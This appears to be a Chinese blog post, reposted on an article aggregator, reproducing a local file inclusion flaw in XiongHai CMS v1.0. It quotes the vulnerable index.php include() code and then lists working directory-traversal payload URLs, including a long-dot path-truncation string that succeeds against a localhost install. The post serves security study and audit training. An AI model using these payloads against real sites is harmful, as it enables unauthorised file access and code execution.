欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

代码审计:熊海cms 首页文件包含漏洞复现

程序员文章站 2022-04-30 11:42:09
...

代码审计:熊海cms 首页文件包含漏洞复现

熊海cms

熊海CMS是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。
适用于个人博客、个人网站、企业网站等各种用途,前台采用电脑、移动端两种显示模式,后台使用HML5响应式布局。
复现版本为 熊海CMS_V1.0 版本,各位可自行下载。

代码审计

先使用Seay工具审计一波,根据关键代码回溯。
代码审计:熊海cms 首页文件包含漏洞复现
工具显示index.php中文件包含函数存在变量,存在漏洞。
具体代码如下:

<?php
	//单一入口模式
	error_reporting(0); //关闭错误显示
	$file=addslashes($_GET['r']); //接收文件名
	$action=$file==''?'index':$file; //判断为空或者等于index
	include('files/'.$action.'.php'); //载入相应文件
?>

这是个很典型的文件包含漏洞,接受r参数,r不为空则带入包含文件。

漏洞复现

在根目录下存放一个测试文件1.php。
代码审计:熊海cms 首页文件包含漏洞复现
利用漏洞包含文件。

%00截断,失败
http://localhost/xionghai_v1.0/index.php?r=../1.php%00
?号截断,失败
http://localhost/xionghai_v1.0/index.php?r=../1.php?
.溢出截断,成功
http://localhost/xionghai_v1.0/index.php?r=../1.php........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

代码审计:熊海cms 首页文件包含漏洞复现

相关标签: 代码审计